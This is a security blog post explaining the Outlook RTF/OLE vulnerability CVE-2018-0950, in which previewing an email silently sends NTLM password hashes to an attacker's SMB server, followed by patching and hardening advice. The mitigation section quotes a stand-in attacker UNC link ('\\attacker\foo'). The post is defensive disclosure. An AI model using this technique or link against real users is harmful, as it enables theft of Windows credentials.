Reading an email in Microsoft Outlook is causing your sensitive information to leak

Reading an email in Microsoft Outlook is causing your sensitive information to leak

A vulnerability, discovered by Will Dormann, a vulnerability analyst at the CERT Coordination Center (CERT/CC). This vulnerability (CVE-2018-0950) could allow cybercriminals to steal sensitive information, including users’ Windows login credentials, by convincing victims to preview an email with Microsoft Outlook, without requiring any additional user interaction. [1]

How did it happen?

When a Rich Text (RTF) email is previewed in Microsoft Outlook, remotely-hosted OLE content is retrieved without requiring any additional user interaction. This situation can leak private information including the user’s password hash, which may be cracked by an attacker. [2]

The case of Microsoft Outlook

Microsoft Outlook will automatically retrieve remote OLE content when an RTF email is previewed. When remote OLE content is hosted on an SMB/CIFS server, the Windows client system will attempt to authenticate with the server using single sign-on (SSO); this may leak the user’s IP address, domain name, username, hostname, and password hash. If the user’s password isn’t secure, a cybercriminal can crack the password in a short amount of time.[2]

Basics of OLE

OLE is a technology of Microsoft allows content from one program to be embedded into a document handled by another program released in 1990. For instance, in Windows 3.x Microsoft Write provides the ability to embed a “Paintbrush Picture” object, as well as a “Sound” or a “Package” which are the three available OLE objects that can be inserted into a Write document[3]

Write document

Picture 1. Once inserted, there is a Write document that has embedded Paintbrush content (Source: Dormann, 2018)

Outlook write document

Picture 2. Write Document (Source: Dormann, 2018)

 

Microsoft Outlook is an email client that comes with Microsoft Office. Outlook includes the ability to send rich text (RTF) email messages which can consist of OLE objects in them. [3]

Picture 3. RTF (Source: Dormann, 2018)

Microsoft outlook vulnerability

A remote, unauthenticated cybercriminal can obtain the victim’s IP address, domain name, username, hostname, and password hash, by merely convincing a user to preview an RTF email message with Microsoft Outlook.  This password hash may be cracked offline. This vulnerability may be combined with other weaknesses to modify the impact. [2]

A remote attacker can exploit this vulnerability by sending an RTF email to a target victim, containing a remotely-hosted image file (OLE object), loading from the attacker-controlled SMB1 server. Because Microsoft Outlook automatically renders OLE content, it will initiate an automatic authentication with the cybercriminal’s controlled remote server over SMB protocol using single sign-on (SSO), handing over the victim’s username and NTLMv2 hashed version of the password, potentially allowing the attacker to gain access to the victim’s system.[1]

Credentials are leaked from microsoft outlookPicture 4. IP address, Domain name, Username, Hostname, SMB session key are leaked (Source: Dormann, 2018)

An SMB connection is being automatically negotiated. Because Outlook is previewing an email that is sent to it. In picture 4, IP address, Domain name, Username, Hostname, SMB session key are leaked. “A remote OLE object in a rich text email messages functions like a web bug on steroids!” [3]

Why would any Windows PC automatically hand over credentials to the cybercriminal’s SMB server?

SMB authentication mechanism

Picture 5. SMB authentication mechanism (Source: thehackernews, 2018)

This is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.

Microsoft Outlook Behavior

HTML email messages on the Internet are much more common than rich text email, so first look at the behaviour of Microsoft Outlook when viewing an HTML message that has a remote image on a web server [3]

Microsoft outlokk vulnerability Remote image is not loaded automatically

Picture 6. The remote image is not loaded automatically (Source: Dormann, 2018)

It can be seen that the remote image is not loaded automatically,  because if Outlook has allowed remote images to load automatically, it can leak the client system’s IP address and other metadata such as the time that an email is viewed. This restriction helps to protect against a web bug being used in email messages. However when we try the same sort of message, except in rich text format; and rather than a remote image file, it’s an OLE document that is loaded from a remote SMB server [3]

Misrosoft outlook vulnerability RTF text messagePicture 7. RTF text message (Source: Dormann, 2018)

Outlook blocks remote web content due to the privacy risk of web bugs; however, with a rich text email, the OLE object is loaded with no user interaction.

Solutions [2]

Apply and update

This vulnerability is addressed in the Microsoft update for CVE-2018-0950. This update prevents Outlook from automatically initiating SMB connections when an RTF email is previewed. Note that other techniques requiring additional user interaction will still function after this patch is installed. For example, if an email contains a UNC link, like \\attacker\foo, Outlook will automatically make this link clickable. If a user clicks such a link, the impact will be the same as with this vulnerability. For this reason, please also consider the following workarounds.

Block inbound and outbound SMB connections at your network border

This can be accomplished by blocking ports 445/tcp, 137/tcp, 139/tcp, as well as 137/udp and 139/udp.

Block NTLM Single Sign-on (SSO) authentication

Block NTLM Single Sign-on (SSO) authentication, as specified in Microsoft Security Advisory ADV170014. Starting with Windows 10 and Server 2016, if the EnterpriseAccountSSO registry value is created and set to 0, SSO authentication will be disabled for external and unspecified network resources. With this registry change, accessing SMB resources is still allowed, but external and unspecified SMB resources will require the user to enter credentials as opposed to automatically attempting to use the hash of the currently logged-on user.

Use strong passwords

Assume that at some point your client system will attempt to make an SMB connection to an attacker’s server. For this reason, make sure that any Windows login has a sufficiently complex password so that it is resistant to cracking. The following two strategies can help achieve this goal:

  • Use a password manager to help generate complex random passwords. This strategy can help ensure the use of unique passwords across resources that you use, and it can ensure that the passwords are of sufficient complexity and randomness.
  • Use longer passphrases (with mixed-case letters, numbers and symbols) instead of passwords. This strategy can produce significant credentials that do not require additional software to store and retrieve.

References

[1] https://thehackernews.com/2018/04/outlook-smb-vulnerability.html

[2] https://www.kb.cert.org/vuls/id/974272

[3] https://insights.sei.cmu.edu/cert/2018/04/automatically-stealing-password-hashes-with-microsoft-outlook-and-ole.html

  1. Server Message Block (SMB):  The Server Message Block Protocol (SMB protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. It can also carry transaction protocols for interprocess communication. Created by IBM in the 1980s, the SMB protocol has since spawned multiple variants or implementations, also known as dialects, to meet evolving network requirements over the years. For more details visit https://searchnetworking.techtarget.com/definition/Server-Message-Block-Protocol

Share this post